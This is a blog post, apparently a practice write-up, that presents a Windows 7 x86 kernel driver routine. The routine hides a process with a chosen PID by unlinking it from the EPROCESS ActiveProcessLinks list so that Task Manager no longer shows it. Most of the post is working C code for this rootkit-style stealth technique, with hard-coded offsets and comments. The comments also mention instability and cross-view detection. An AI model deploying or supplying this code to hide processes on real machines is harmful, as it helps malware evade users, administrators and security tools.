[Driver] Hiding a process at driver level by unlinking it from the active-process list, so Task Manager cannot see it

Written in my spare time for practice; there is nothing technically deep here, just a simple unlinking from the process list so that Task Manager can no longer see the process.

Test environment: Windows 7 x86 (the EPROCESS offsets used in the code below were taken from this build).

/* Per-process view assembled while walking ActiveProcessLinks (see HideProcess).
 * The fields are raw kernel addresses/values and are only meaningful for the
 * build whose EPROCESS offsets the walker hard-codes. */
typedef struct 
{
	DWORD_PTR	EProcess;   /* address of the process's EPROCESS */
	UCHAR*		ImageName;  /* points into EPROCESS.ImageFileName; not guaranteed NUL-terminated */
	ULONG		ProcessID;  /* PID read from EPROCESS as a 32-bit value */
}_Process_Info;

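/* EPROCESS field offsets for the page's stated target, Windows 7 x86.
 * They are build-specific: on any other build these reads and writes land on
 * unrelated kernel memory, so verify them against the target's symbols
 * (WinDbg: dt nt!_EPROCESS) before loading this driver. */
enum {
	EPROCESS_UNIQUE_PROCESS_ID    = 0xb4,  /* HANDLE UniqueProcessId (4 bytes on x86) */
	EPROCESS_ACTIVE_PROCESS_LINKS = 0xb8,  /* LIST_ENTRY ActiveProcessLinks */
	EPROCESS_IMAGE_FILE_NAME      = 0x16c, /* UCHAR ImageFileName[15]; may lack a NUL */
	IMAGE_FILE_NAME_LEN           = 15,
	HIDDEN_PROCESS_ID             = 504    /* the PID the original code unlinks */
};

/* Copy EPROCESS.ImageFileName into a NUL-terminated buffer so it can be printed
 * with %s.  The kernel field is a fixed 15-byte array that is not guaranteed to
 * be NUL-terminated (the original comment ran into exactly this), so printing
 * it in place can read past the field.  dst must hold IMAGE_FILE_NAME_LEN + 1. */
static void CopyImageFileName(const UCHAR *src, CHAR *dst)
{
	ULONG i;

	for (i = 0; i < IMAGE_FILE_NAME_LEN; i++) {
		dst[i] = (CHAR)src[i];
	}
	dst[IMAGE_FILE_NAME_LEN] = '\0';
}

/* Walk ActiveProcessLinks starting at the current process, log every entry with
 * KdPrint, and unlink the entry whose PID is HIDDEN_PROCESS_ID so that
 * list-based enumeration (what Task Manager ends up relying on) no longer
 * reports it.
 *
 * Returns STATUS_SUCCESS unconditionally.  The unlinked entry's own Flink/Blink
 * are left pointing at its former neighbours; that is one reason this technique
 * is unstable (the kernel removes the entry from the list again when the
 * process exits) and detectable by cross-view comparison (e.g. PspCidTable
 * versus this list). */
NTSTATUS HideProcess(void)
{
	DWORD_PTR currentEProcess = (DWORD_PTR)PsGetCurrentProcess();
	/* ActiveProcessLinks lives at EPROCESS + 0xb8 (the original comment said
	 * 0x16c + 0xb8, which is wrong; 0x16c is ImageFileName). */
	PLIST_ENTRY listHead = (PLIST_ENTRY)(currentEProcess + EPROCESS_ACTIVE_PROCESS_LINKS);
	PLIST_ENTRY entry;
	CHAR imageName[IMAGE_FILE_NAME_LEN + 1];
	int count = 0;

	CopyImageFileName((const UCHAR *)(currentEProcess + EPROCESS_IMAGE_FILE_NAME), imageName);
	KdPrint(("SpriteDrv: Current Image File Name: %s\n", imageName));

	/* The list is circular and the current process's own entry serves as the
	 * head, so the walk ends when it comes back around to it; the current
	 * process itself is never examined or unlinked.  Advancing via entry->Flink
	 * still works after an unlink because only the neighbours are rewritten. */
	for (entry = listHead->Flink; entry != listHead; entry = entry->Flink) {
		_Process_Info info;

		/* Step back from the embedded LIST_ENTRY to the owning EPROCESS. */
		info.EProcess  = (DWORD_PTR)entry - EPROCESS_ACTIVE_PROCESS_LINKS;
		info.ImageName = (UCHAR *)(info.EProcess + EPROCESS_IMAGE_FILE_NAME);
		/* UniqueProcessId is a HANDLE; reading it as ULONG is only correct on x86. */
		info.ProcessID = *(ULONG *)(info.EProcess + EPROCESS_UNIQUE_PROCESS_ID);

		CopyImageFileName(info.ImageName, imageName);
		KdPrint(("SpriteDrv: Image File Name: %s\t\t%d\n", imageName, info.ProcessID));

		/* Match on PID: ImageFileName is neither reliably terminated nor unique,
		 * so it is not a usable key. */
		if (info.ProcessID == HIDDEN_PROCESS_ID) {
			/* Unlink: the neighbours skip this entry.  Its own links are left
			 * untouched, as in the original. */
			entry->Blink->Flink = entry->Flink;
			entry->Flink->Blink = entry->Blink;
		}

		count++;
	}

	KdPrint(("SpriteDrv: Process size: %d\n", count));

	return STATUS_SUCCESS;
}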

Result screenshot (image omitted here)

If there are errors, please point them out in the comments.


Source: blog.csdn.net/u012088909/article/details/84571600